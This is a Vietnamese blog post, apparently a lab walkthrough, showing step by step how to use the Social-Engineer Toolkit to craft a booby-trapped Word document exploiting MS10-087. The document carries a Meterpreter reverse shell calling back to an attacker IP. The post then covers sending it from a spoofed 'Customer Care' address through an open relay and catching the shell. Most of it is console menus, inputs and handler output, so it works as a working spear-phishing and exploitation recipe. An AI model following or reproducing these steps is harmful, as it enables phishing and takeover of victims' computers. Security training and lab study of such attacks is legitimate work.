{"id":308,"date":"2015-09-11T09:25:03","date_gmt":"2015-09-11T09:25:03","guid":{"rendered":"http:\/\/onlinelab.info\/?p=308"},"modified":"2015-09-11T09:25:03","modified_gmt":"2015-09-11T09:25:03","slug":"set-social-engineering-toolkit-phishing-and-e-mail-hacking","status":"publish","type":"post","link":"https:\/\/www.asianux.org.vn\/index.php\/2015\/09\/11\/set-social-engineering-toolkit-phishing-and-e-mail-hacking\/","title":{"rendered":"SET: SOCIAL ENGINEERING TOOLKIT \u2013 PHISHING AND E-MAIL HACKING"},"content":{"rendered":"

Nh\u01b0 ch\u00fang ta \u0111\u00e3 bi\u1ebft phishing l\u00e0 h\u00ecnh th\u1ee9c g\u1eedi nh\u1eefng email c\u00f3 n\u00f4i dung l\u1eeba \u0111\u1ea3o \u0111\u1ebfn ng\u01b0\u1eddi d\u00f9ng trong h\u1ec7 th\u1ed1ng. Th\u1ef1c t\u1ebf cho th\u1ea5y r\u1eb1ng vi\u1ec7c t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng \u0111a s\u1ed1 \u0111\u1ec1u t\u1eeb ng\u01b0\u1eddi d\u00f9ng cu\u1ed1i. Ch\u00fang ta c\u00f3 th\u1ec3 hi\u1ec3u r\u1eb1ng thay v\u00ec t\u00ecm ra hay t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c m\u00e1y ch\u1ee7, c\u00e1c t\u00e0i kho\u1ea3n c\u1ee7a ng\u01b0\u1eddi qu\u1ea3n tr\u1ecb th\u00ec ch\u00fang ta t\u1ea5n c\u00f4ng v\u00e0o nh\u1eefng ng\u01b0\u1eddi d\u00f9ng v\u0103n ph\u00f2ng \u00edt b\u1ea3o m\u1eadt h\u01a1n sau \u0111\u00f3 d\u00f9ng c\u00e1c bi\u1ec7n ph\u00e1p leo thang \u0111\u1eb7c quy\u1ec1n \u0111\u1ec3 do th\u00e1m \u0111\u00e1nh c\u1eafp nh\u1eefng th\u00f4ng tin nh\u1eady c\u1ea3m. Trong b\u00e0i vi\u1ebft n\u00e0y t\u00f4i n\u00f3i \u0111\u1ebfn vi\u1ec7c gi\u1ea3 m\u1ea1o g\u1eedi mail kh\u00e1c l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt t\u1eeb nh\u1eefng t\u00e0i li\u1ec7u v\u0103n b\u1ea3n hay c\u00f2n g\u1ecdi l\u00e0 File Format. B\u00e0i lab s\u1ebd demo h\u00ecnh th\u1ee9 gi\u1ea3 m\u1ea1o email, t\u1ea5n c\u00f4ng v\u00e0o l\u1ed7 h\u1ed5ng Word 2007 cho ph\u00e9p hacker g\u00e1n quy\u1ec1n meterpreter shell v\u00e0 chi\u1ebfm \u0111o\u1ea1t h\u1ec7 th\u1ed1ng.<\/p>\n

B\u01b0\u1edbc 1:<\/strong> quay tr\u1edf l\u1ea1i m\u00e0n h\u00ecnh \u0111\u1ea7u ti\u00ean c\u1ee7a \u201cSET\u201d.<\/strong> Nh\u1eadp v\u00e0o 1<\/strong> \u201cSocial-Engineering Attacks\u201d<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n<\/div>\n<\/td>\n
\n
\n
Select <\/span>from <\/span>the <\/span>menu<\/span>:<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0 <\/span>1<\/span>)<\/span> Social<\/span>–<\/span>Engineering <\/span>Attacks<\/span><\/div>\n
\u00a0\u00a0 <\/span>2<\/span>)<\/span> Fast<\/span>–<\/span>Track <\/span>Penetration <\/span>Testing<\/span><\/div>\n
\u00a0\u00a0 <\/span>3<\/span>)<\/span> Third <\/span>Party <\/span>Modules<\/span><\/div>\n
\u00a0\u00a0 <\/span>4<\/span>)<\/span> Update <\/span>the <\/span>Social<\/span>–<\/span>Engineer <\/span>Toolkit<\/span><\/div>\n
\u00a0\u00a0 <\/span>5<\/span>)<\/span> Update <\/span>SET <\/span>configuration<\/span><\/div>\n
\u00a0\u00a0 <\/span>6<\/span>)<\/span> Help<\/span>,<\/span> Credits<\/span>,<\/span> and<\/span> About<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>99<\/span>)<\/span> Exit <\/span>the <\/span>Social<\/span>–<\/span>Engineer <\/span>Toolkit<\/span><\/div>\n
<\/div>\n
set<\/span>><\/span> 1<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

\u00a0B\u01b0\u1edbc 2:<\/strong> nh\u1eadp v\u00e0o\u00a01 \u201cSpear-Phishing Attack Vectors\u201d<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n<\/div>\n<\/td>\n
\n
\n
Select <\/span>from <\/span>the <\/span>menu<\/span>:<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0 <\/span>1<\/span>)<\/span> Spear<\/span>–<\/span>Phishing <\/span>Attack <\/span>Vectors<\/span><\/div>\n
\u00a0\u00a0 <\/span>2<\/span>)<\/span> Website <\/span>Attack <\/span>Vectors<\/span><\/div>\n
\u00a0\u00a0 <\/span>3<\/span>)<\/span> Infectious <\/span>Media <\/span>Generator<\/span><\/div>\n
\u00a0\u00a0 <\/span>4<\/span>)<\/span> Create<\/span> a<\/span> Payload <\/span>and<\/span> Listener<\/span><\/div>\n
\u00a0\u00a0 <\/span>5<\/span>)<\/span> Mass <\/span>Mailer <\/span>Attack<\/span><\/div>\n
\u00a0\u00a0 <\/span>6<\/span>)<\/span> Arduino<\/span>–<\/span>Based <\/span>Attack <\/span>Vector<\/span><\/div>\n
\u00a0\u00a0 <\/span>7<\/span>)<\/span> Wireless <\/span>Access <\/span>Point <\/span>Attack <\/span>Vector<\/span><\/div>\n
\u00a0\u00a0 <\/span>8<\/span>)<\/span> QRCode <\/span>Generator <\/span>Attack <\/span>Vector<\/span><\/div>\n
\u00a0\u00a0 <\/span>9<\/span>)<\/span> Powershell <\/span>Attack <\/span>Vectors<\/span><\/div>\n
\u00a0\u00a0<\/span>10<\/span>)<\/span> Third <\/span>Party <\/span>Modules<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>99<\/span>)<\/span> Return<\/span> back <\/span>to<\/span> the <\/span>main <\/span>menu<\/span>.<\/span><\/div>\n
<\/div>\n
set<\/span>><\/span> 1<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

B\u01b0\u1edbc 3:<\/strong> nh\u1eadp v\u00e0o 2 \u201cCreate a FileFormat Payload\u201d<\/strong> . T\u1ea1o payload d\u01b0\u1edbi d\u1ea1ng files v\u0103n b\u1ea3n<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0\u00a0 <\/span>1<\/span>)<\/span> Perform<\/span> a<\/span> Mass <\/span>Email <\/span>Attack<\/span><\/div>\n
\u00a0\u00a0 <\/span>2<\/span>)<\/span> Create<\/span> a<\/span> FileFormat <\/span>Payload<\/span><\/div>\n
\u00a0\u00a0 <\/span>3<\/span>)<\/span> Create<\/span> a<\/span> Social<\/span>–<\/span>Engineering <\/span>Template<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>99<\/span>)<\/span> Return<\/span> to<\/span> Main <\/span>Menu<\/span><\/div>\n
<\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span>2<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

B\u01b0\u1edbc 4:<\/strong> ch\u1ecdn payload. \u1ede \u0111\u00e2y t\u00f4i ch\u1ecdn 5.<\/strong> T\u1ea5n c\u00f4ng v\u00e0o l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt nguy hi\u1ec3mMS10-087<\/strong> tr\u00ean Micsosoft Office 2003 \u2013 2010<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0\u00a0 <\/span>1<\/span>)<\/span> SET <\/span>Custom <\/span>Written <\/span>DLL <\/span>Hijacking <\/span>Attack <\/span>Vector<\/span> (<\/span>RAR<\/span>,<\/span> ZIP<\/span>)<\/span><\/div>\n
\u00a0\u00a0 <\/span>2<\/span>)<\/span> SET <\/span>Custom <\/span>Written <\/span>Document <\/span>UNC <\/span>LM <\/span>SMB <\/span>Capture <\/span>Attack<\/span><\/div>\n
\u00a0\u00a0 <\/span>3<\/span>)<\/span> MS14<\/span>–<\/span>017<\/span> Microsoft <\/span>Word<\/span> RTF <\/span>Object<\/span> Confusion<\/span> (<\/span>2014<\/span>–<\/span>04<\/span>–<\/span>01<\/span>)<\/span><\/div>\n
\u00a0\u00a0 <\/span>4<\/span>)<\/span> Microsoft <\/span>Windows <\/span>CreateSizedDIBSECTION <\/span>Stack <\/span>Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0 <\/span>5<\/span>)<\/span> Microsoft <\/span>Word<\/span> RTF <\/span>pFragments <\/span>Stack <\/span>Buffer <\/span>Overflow<\/span> (<\/span>MS10<\/span>–<\/span>087<\/span>)<\/span><\/div>\n
\u00a0\u00a0 <\/span>6<\/span>)<\/span> Adobe <\/span>Flash <\/span>Player<\/span> “Button”<\/span> Remote <\/span>Code <\/span>Execution<\/span><\/div>\n
\u00a0\u00a0 <\/span>7<\/span>)<\/span> Adobe <\/span>CoolType <\/span>SING <\/span>Table<\/span> “uniqueName”<\/span> Overflow<\/span><\/div>\n
\u00a0\u00a0 <\/span>8<\/span>)<\/span> Adobe <\/span>Flash <\/span>Player<\/span> “newfunction”<\/span> Invalid <\/span>Pointer <\/span>Use<\/span><\/div>\n
\u00a0\u00a0 <\/span>9<\/span>)<\/span> Adobe <\/span>Collab<\/span>.<\/span>collectEmailInfo <\/span>Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0<\/span>10<\/span>)<\/span> Adobe <\/span>Collab<\/span>.<\/span>getIcon <\/span>Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0<\/span>11<\/span>)<\/span> Adobe <\/span>JBIG2Decode <\/span>Memory <\/span>Corruption <\/span>Exploit<\/span><\/div>\n
\u00a0\u00a0<\/span>12<\/span>)<\/span> Adobe <\/span>PDF <\/span>Embedded <\/span>EXE <\/span>Social <\/span>Engineering<\/span><\/div>\n
\u00a0\u00a0<\/span>13<\/span>)<\/span> Adobe <\/span>util<\/span>.<\/span>printf<\/span>(<\/span>)<\/span> Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0<\/span>14<\/span>)<\/span> Custom <\/span>EXE <\/span>to<\/span> VBA<\/span> (<\/span>sent <\/span>via <\/span>RAR<\/span>)<\/span> (<\/span>RAR <\/span>required<\/span>)<\/span><\/div>\n
\u00a0\u00a0<\/span>15<\/span>)<\/span> Adobe <\/span>U3D <\/span>CLODProgressiveMeshDeclaration <\/span>Array<\/span> Overrun<\/span><\/div>\n
\u00a0\u00a0<\/span>16<\/span>)<\/span> Adobe <\/span>PDF <\/span>Embedded <\/span>EXE <\/span>Social <\/span>Engineering<\/span> (<\/span>NOJS<\/span>)<\/span><\/div>\n
\u00a0\u00a0<\/span>17<\/span>)<\/span> Foxit <\/span>PDF <\/span>Reader <\/span>v4<\/span>.<\/span>1.1<\/span> Title <\/span>Stack <\/span>Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0<\/span>18<\/span>)<\/span> Apple <\/span>QuickTime <\/span>PICT <\/span>PnSize <\/span>Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0<\/span>19<\/span>)<\/span> Nuance <\/span>PDF <\/span>Reader <\/span>v6<\/span>.<\/span>0<\/span> Launch <\/span>Stack <\/span>Buffer <\/span>Overflow<\/span><\/div>\n
\u00a0\u00a0<\/span>20<\/span>)<\/span> Adobe <\/span>Reader <\/span>u3D <\/span>Memory <\/span>Corruption <\/span>Vulnerability<\/span><\/div>\n
\u00a0\u00a0<\/span>21<\/span>)<\/span> MSCOMCTL <\/span>ActiveX <\/span>Buffer <\/span>Overflow<\/span> (<\/span>ms12<\/span>–<\/span>027<\/span>)<\/span><\/div>\n
<\/div>\n
set<\/span>:<\/span>payloads<\/span>><\/span>5<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

Ch\u1ecdn ti\u1ebfp 2<\/strong> \u0111\u1ec3 t\u1ea1o meterpreter reverse_shell<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0\u00a0<\/span>1<\/span>)<\/span> Windows <\/span>Reverse <\/span>TCP <\/span>Shell\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>Spawn<\/span> a<\/span> command <\/span>shell <\/span>on <\/span>victim <\/span>and<\/span> send <\/span>back <\/span>to<\/span> attacker<\/span><\/div>\n
\u00a0\u00a0 <\/span>2<\/span>)<\/span> Windows <\/span>Meterpreter <\/span>Reverse_TCP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>Spawn<\/span> a<\/span> meterpreter <\/span>shell <\/span>on <\/span>victim <\/span>and<\/span> send <\/span>back <\/span>to<\/span> attacker<\/span><\/div>\n
\u00a0\u00a0 <\/span>3<\/span>)<\/span> Windows <\/span>Reverse <\/span>VNC <\/span>DLL\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>Spawn<\/span> a<\/span> VNC <\/span>server <\/span>on <\/span>victim <\/span>and<\/span> send <\/span>back <\/span>to<\/span> attacker<\/span><\/div>\n
\u00a0\u00a0 <\/span>4<\/span>)<\/span> Windows <\/span>Reverse <\/span>TCP <\/span>Shell<\/span> (<\/span>x64<\/span>)<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>Windows <\/span>X64 <\/span>Command <\/span>Shell<\/span>,<\/span> Reverse <\/span>TCP <\/span>Inline<\/span><\/div>\n
\u00a0\u00a0 <\/span>5<\/span>)<\/span> Windows <\/span>Meterpreter <\/span>Reverse_TCP<\/span> (<\/span>X64<\/span>)<\/span>\u00a0\u00a0<\/span>Connect <\/span>back <\/span>to<\/span> the <\/span>attacker<\/span> (<\/span>Windows <\/span>x64<\/span>)<\/span>,<\/span> Meterpreter<\/span><\/div>\n
\u00a0\u00a0 <\/span>6<\/span>)<\/span> Windows <\/span>Shell <\/span>Bind_TCP<\/span> (<\/span>X64<\/span>)<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>Execute <\/span>payload <\/span>and<\/span> create <\/span>an <\/span>accepting <\/span>port <\/span>on <\/span>remote <\/span>system<\/span><\/div>\n
\u00a0\u00a0 <\/span>7<\/span>)<\/span> Windows <\/span>Meterpreter <\/span>Reverse <\/span>HTTPS\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>Tunnel <\/span>communication <\/span>over <\/span>HTTP <\/span>using <\/span>SSL <\/span>and<\/span> use<\/span> Meterpreter<\/span><\/div>\n
<\/div>\n
set<\/span>:<\/span>payloads<\/span>><\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

G\u00f5 ti\u1ebfp \u0111\u1ecba ch\u1ec9 IP Attacker<\/strong> , port listener<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n<\/div>\n<\/td>\n
\n
\n
set<\/span>><\/span> IP <\/span>address <\/span>for<\/span> the <\/span>payload <\/span>listener<\/span>:<\/span> 10.0.0.131<\/span><\/div>\n
set<\/span>:<\/span>payloads<\/span>><\/span> Port <\/span>to<\/span> connect <\/span>back <\/span>on<\/span> [<\/span>443<\/span>]<\/span>:<\/span>443<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

B\u01b0\u1edbc 5:<\/strong> ch\u1ecdn 2<\/strong> \u0111\u1ed5i t\u00ean files . \u1ede \u0111\u00e2y t\u00f4i s\u1ebd \u0111\u1ed5i t\u00ean files g\u1eedi cho n\u1ea1n nh\u00e2n l\u00e0 daily.doc<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n<\/div>\n<\/td>\n
\n
\n
\u00a0\u00a0 <\/span>Do<\/span> you <\/span>want <\/span>to<\/span> rename <\/span>the <\/span>file<\/span>?<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0 <\/span>example <\/span>Enter <\/span>the <\/span>new<\/span> filename<\/span>:<\/span> moo<\/span>.<\/span>pdf<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>1.<\/span> Keep <\/span>the <\/span>filename<\/span>,<\/span> I<\/span> don<\/span>‘t<\/span> care<\/span>.<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>2.<\/span> Rename <\/span>the <\/span>file<\/span>,<\/span> I<\/span> want <\/span>to<\/span> be <\/span>cool<\/span>.<\/span><\/div>\n
<\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span>2<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> New<\/span> filename<\/span>:<\/span>daily<\/span>.<\/span>doc<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

B\u01b0\u1edbc 6:<\/strong> trong b\u01b0\u1edbc n\u00e0y \u0111\u1ec3 t\u1ea5n c\u00f4ng h\u00e0ng lo\u1ea1t email ch\u1ecdn 2<\/strong>. Nh\u01b0ng t\u00f4i ch\u1ec9 demo 1<\/strong>email n\u00ean ch\u1ecdn 1<\/strong>.<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n<\/div>\n<\/td>\n
\n
\n
What <\/span>do<\/span> you <\/span>want <\/span>to<\/span> do<\/span>:<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0 <\/span>1.<\/span>\u00a0\u00a0<\/span>E<\/span>–<\/span>Mail <\/span>Attack <\/span>Single <\/span>Email <\/span>Address<\/span><\/div>\n
\u00a0\u00a0 <\/span>2.<\/span>\u00a0\u00a0<\/span>E<\/span>–<\/span>Mail <\/span>Attack <\/span>Mass <\/span>Mailer<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0 <\/span>99.<\/span> Return<\/span> to<\/span> main <\/span>menu<\/span>.<\/span><\/div>\n
\u00a0\u00a0 <\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span>1<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

B\u01b0\u1edbc 7:<\/strong> g\u00f5 1<\/strong> ch\u1ecdn m\u1eabu template \u0111\u00e3 c\u00f3 s\u1eb5n. T\u00f4i ch\u1ecdn m\u1eabu status reports<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n<\/div>\n<\/td>\n
\n
\n
Do<\/span> you <\/span>want <\/span>to<\/span> use<\/span> a<\/span> predefined <\/span>template <\/span>or<\/span> craft<\/span><\/div>\n
\u00a0\u00a0 <\/span>a<\/span> one <\/span>time <\/span>email <\/span>template<\/span>.<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0 <\/span>1.<\/span> Pre<\/span>–<\/span>Defined <\/span>Template<\/span><\/div>\n
\u00a0\u00a0 <\/span>2.<\/span> One<\/span>–<\/span>Time <\/span>Use<\/span> Email <\/span>Template<\/span><\/div>\n
<\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span>1<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

ch\u1ecdn 10.<\/strong> Status Report<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n<\/div>\n<\/td>\n
\n
\n
[<\/span>–<\/span>]<\/span> Available <\/span>templates<\/span>:<\/span><\/div>\n
1<\/span>:<\/span> Baby <\/span>Pics<\/span><\/div>\n
2<\/span>:<\/span> Strange <\/span>internet <\/span>usage <\/span>from <\/span>your <\/span>computer<\/span><\/div>\n
3<\/span>:<\/span> Computer <\/span>Issue<\/span><\/div>\n
4<\/span>:<\/span> Order <\/span>Confirmation<\/span><\/div>\n
5<\/span>:<\/span> Dan <\/span>Brown<\/span>‘s<\/span> Angels<\/span> &<\/span> Demons<\/span><\/div>\n
6<\/span>:<\/span> New<\/span> Update<\/span><\/div>\n
7<\/span>:<\/span> How <\/span>long<\/span> has <\/span>it <\/span>been<\/span>?<\/span><\/div>\n
8<\/span>:<\/span><\/div>\n
9<\/span>:<\/span> Have <\/span>you <\/span>seen <\/span>this<\/span>?<\/span><\/div>\n
10<\/span>:<\/span> Status <\/span>Report<\/span><\/div>\n
11<\/span>:<\/span> WOAAAA<\/span>!<\/span>!<\/span>!<\/span>!<\/span>!<\/span>!<\/span>!<\/span>!<\/span>!<\/span>!<\/span> This<\/span> is<\/span> crazy<\/span>.<\/span>.<\/span>.<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span>10<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

B\u01b0\u1edbc 8:<\/strong> thi\u1ebft l\u1eadp c\u00e1c gi\u00e1 tr\u1ecb g\u1eedi, ng\u01b0\u1eddi nh\u1eadn, smtp.<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n<\/div>\n<\/td>\n
\n
\n
set<\/span>:<\/span>phishing<\/span>><\/span> Send <\/span>email <\/span>to<\/span>:<\/span>victim<\/span>@<\/span>vuquyhoa<\/span>.<\/span>com<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>1.<\/span> Use<\/span> a<\/span> gmail <\/span>Account <\/span>for<\/span> your <\/span>email <\/span>attack<\/span>.<\/span><\/div>\n
\u00a0\u00a0<\/span>2.<\/span> Use<\/span> your <\/span>own <\/span>server <\/span>or<\/span> open <\/span>relay<\/span><\/div>\n
<\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span>2<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

Ch\u1ecdn 2<\/strong>: g\u1eedi b\u1eb1ng SMTP replay<\/strong> . Option 1 hi\u1ec7n nay kh\u00f3 ho\u1ea1t \u0111\u1ed9ng v\u00ec Gmail \u0111\u00e3 ch\u1eb7n.<\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n<\/div>\n<\/td>\n
\n
\n
set<\/span>:<\/span>phishing<\/span>><\/span> From <\/span>address<\/span> (<\/span>ex<\/span>:<\/span> moo<\/span>@<\/span>example<\/span>.<\/span>com<\/span>)<\/span>:<\/span>me<\/span>@<\/span>vuquyhoa<\/span>.<\/span>com<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> The <\/span>FROM <\/span>NAME <\/span>user <\/span>will <\/span>see<\/span>:<\/span> :<\/span>Customer <\/span>Care\u00a0\u00a0<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> Username <\/span>for<\/span> open<\/span>–<\/span>relay<\/span> [<\/span>blank<\/span>]<\/span>:<\/span>me<\/span>@<\/span>vuquyhoa<\/span>.<\/span>com<\/span><\/div>\n
Password <\/span>for<\/span> open<\/span>–<\/span>relay<\/span> [<\/span>blank<\/span>]<\/span>:<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> SMTP <\/span>email <\/span>server <\/span>address<\/span> (<\/span>ex<\/span>.<\/span> smtp<\/span>.<\/span>youremailserveryouown<\/span>.<\/span>com<\/span>)<\/span>:<\/span>xx<\/span>.<\/span>xx<\/span>.<\/span>xx<\/span>.<\/span>xx<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> Port <\/span>number <\/span>for<\/span> the <\/span>SMTP <\/span>server<\/span> [<\/span>25<\/span>]<\/span>:<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> Flag <\/span>this<\/span> message<\/span>\/<\/span>s<\/span> as<\/span> high <\/span>priority<\/span>?<\/span> [<\/span>yes<\/span>|<\/span>no<\/span>]<\/span>:<\/span>yes<\/span><\/div>\n
[<\/span>*<\/span>]<\/span> SET <\/span>has <\/span>finished <\/span>delivering <\/span>the <\/span>emails<\/span><\/div>\n
set<\/span>:<\/span>phishing<\/span>><\/span> Setup<\/span> a<\/span> listener<\/span> [<\/span>yes<\/span>|<\/span>no<\/span>]<\/span>:<\/span>yes<\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

Listener ch\u1ecdn yes \u0111\u1ec3 \u201cSET\u201d<\/strong> t\u1ef1 \u0111\u1ed9ng kh\u1edfi \u0111\u1ed9ng MSF<\/strong> l\u1eafng nghe k\u1ebft n\u1ed1i<\/p>\n

B\u01b0\u1edbc 9:<\/strong> Qua m\u00e1y victim ki\u1ec3m tra email. Download v\u00e0 Open v\u0103n b\u1ea3n<\/p>\n

\"Windows<\/a><\/p>\n

 <\/p>\n

Email \u0111\u00e3 \u0111\u01b0\u1ee3c g\u1eedi \u0111\u1ebfn h\u00f2m mail c\u1ee7a victim<\/p>\n

\"Windows<\/a><\/p>\n

 <\/p>\n

Download t\u1eadp tin \u0111\u00ednh k\u00e8m v\u00e0 m\u1edf b\u1eb1ng Word 2007 m\u1eb7c \u0111\u1ecbnh<\/p>\n

\"Windows<\/a><\/p>\n

Sau khi m\u1edf th\u1ea5y Word \u1edf tr\u1ea1ng th\u00e1i treo<\/p>\n

\"Windows<\/a><\/p>\n

 <\/p>\n

Quay tr\u1edd l\u1ea1i m\u00e1y c\u1ee7a Attacker<\/strong> \u0111\u00e3 th\u1ea5y c\u00f3 meterpreter shell.<\/strong><\/p>\n

\n
<\/div>\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n<\/div>\n<\/td>\n
\n
\n
[<\/span>*<\/span>]<\/span> Started <\/span>reverse <\/span>handler <\/span>on<\/span> 10.0.0.131<\/span>:<\/span>443<\/span><\/div>\n
[<\/span>*<\/span>]<\/span> Starting <\/span>the <\/span>payload <\/span>handler<\/span>.<\/span>.<\/span>.<\/span><\/div>\n
[<\/span>*<\/span>]<\/span> Sending <\/span>stage<\/span> (<\/span>769536<\/span> bytes<\/span>)<\/span> to<\/span> 10.0.0.4<\/span><\/div>\n
